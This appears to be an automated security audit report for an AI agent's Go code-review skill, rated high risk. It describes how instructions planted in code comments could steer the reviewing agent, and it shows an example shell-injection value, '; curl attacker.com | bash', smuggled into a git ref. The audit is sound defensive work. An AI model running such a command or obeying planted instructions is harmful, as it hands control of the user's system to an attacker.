code-review
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- Indirect Prompt Injection (HIGH): The skill is designed to ingest and analyze untrusted external content (Go source code and git diffs) for security and performance audits. There are no boundary markers or instructions to treat the analyzed code as data rather than instructions. An attacker could embed malicious instructions within code comments to manipulate the review report or influence the agent's subsequent actions.
- Ingestion points:
git diffoutputs and user-specified files/functions. - Boundary markers: Absent. The agent is not instructed to ignore embedded instructions in the code.
- Capability inventory: Performs security audits, architectural analysis, and provides high-influence recommendations.
- Sanitization: None provided in the skill definition.
- Command Execution (MEDIUM): The skill instructs the agent to run
git diff <ref>~1..<ref>where<ref>is a user-supplied string. If the execution environment does not strictly sanitize this input, it could be exploited for shell command injection (e.g., providing a ref like; curl attacker.com | bash).
Recommendations
- AI detected serious security threats
Audit Metadata